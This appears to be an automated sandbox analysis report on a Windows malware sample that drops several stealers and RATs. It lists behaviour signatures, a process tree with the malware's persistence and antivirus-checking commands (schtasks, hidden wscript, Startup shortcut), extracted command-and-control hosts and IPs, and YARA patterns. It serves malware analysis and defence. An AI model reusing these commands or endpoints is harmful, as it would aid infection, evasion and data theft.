Edit tour

Windows Analysis Report
wfJfUGeGT3.exe

Overview

General Information

Sample name:	wfJfUGeGT3.exe renamed because original name is a hash value
Original sample name:	046ebd7e0f619f33de609ea3f126b0d3.exe
Analysis ID:	1502163
MD5:	046ebd7e0f619f33de609ea3f126b0d3
SHA1:	37a0b634955eb29f9bc7d3d434838cd729bb7e17
SHA256:	bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555
Tags:	exeFormbook
Infos:

Detection

Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected XWorm

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wfJfUGeGT3.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\wfJfUGeGT3.exe" MD5: 046EBD7E0F619F33DE609EA3F126B0D3)

cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7420 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7472 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7532 cmdline: cmd /c md 591950 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7548 cmdline: findstr /V "BachelorRayPotentialBeats" Itsa MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7564 cmdline: cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Shipment.pif (PID: 7580 cmdline: Shipment.pif E MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 7616 cmdline: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7664 cmdline: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7680 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

kitty.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 7708 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Cerker.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

build2.exe (PID: 6056 cmdline: "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe" MD5: F9A4F6684D1BF48406A42921AEBC1596)

contorax.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe" MD5: 771B8E84BA4F0215298D9DADFE5A10BF)

winmsbt.exe (PID: 5512 cmdline: "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe" MD5: 771B8E84BA4F0215298D9DADFE5A10BF)

3546345.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe" MD5: FD2DEFC436FC7960D6501A01C91D893E)

meta.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe" MD5: 3AACE51D76B16A60E94636150BD1137E)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

InstallUtil.exe (PID: 4204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GOLD.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe" MD5: D6FCA3CD57293390CCF9D2BC83662DDA)

RegAsm.exe (PID: 384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 3472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

crypteda.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe" MD5: 8E74497AFF3B9D2DDB7E7F819DFC69BA)

RegAsm.exe (PID: 4500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

choice.exe (PID: 7596 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 7732 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

GuardTrack.scr (PID: 7788 cmdline: "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 7856 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

GuardTrack.scr (PID: 7896 cmdline: "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

Cerker.exe (PID: 2072 cmdline: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 7800 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IIZS2TRqf69aZbLAX3cf3edn.exe (PID: 5052 cmdline: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" MD5: DB5717FD494495EEA3C8F7D4AB29D6B0)

Cerker.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

schtasks.exe (PID: 2508 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Cerker.exe (PID: 5804 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Xworm

{"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Threatname: Amadey

{"C2 url": "193.176.158.185/B0kf3CbAbR/index.php", "Version": "4.41", "Install Folder": "fed0c9a4d3", "Install File": "Hkbsse.exe"}

Threatname: Cryptbot

{"C2 list": ["POST13vt.top", "analforeverlovyu.top", "+#thizx13vt.top", "13vt.top", "thizx13vt.top", "t.top", "+thizx13vt.top"]}

Threatname: RedLine

{"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\Windows.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\Windows.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\Windows.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x11c0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12060:$s6: VirtualBox 0x11fbe:$s8: Win32_ComputerSystem 0x1574b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x157e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x158fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x140df:$cnc4: POST / HTTP/1.1
0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x113e8:$s6: VirtualBox 0x11346:$s8: Win32_ComputerSystem 0x14ad3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14b70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14c85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13467:$cnc4: POST / HTTP/1.1
00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 3546345.exe PID: 7096	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: GOLD.exe PID: 8036	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3472	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 4204	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4500	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
43.2.GOLD.exe.3405570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf7e8:$s6: VirtualBox 0xf746:$s8: Win32_ComputerSystem 0x12ed3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12f70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13085:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11867:$cnc4: POST / HTTP/1.1
51.2.RegAsm.exe.482060.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
51.2.RegAsm.exe.482060.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
51.2.RegAsm.exe.482060.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
43.2.GOLD.exe.3405570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
51.2.RegAsm.exe.436060.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
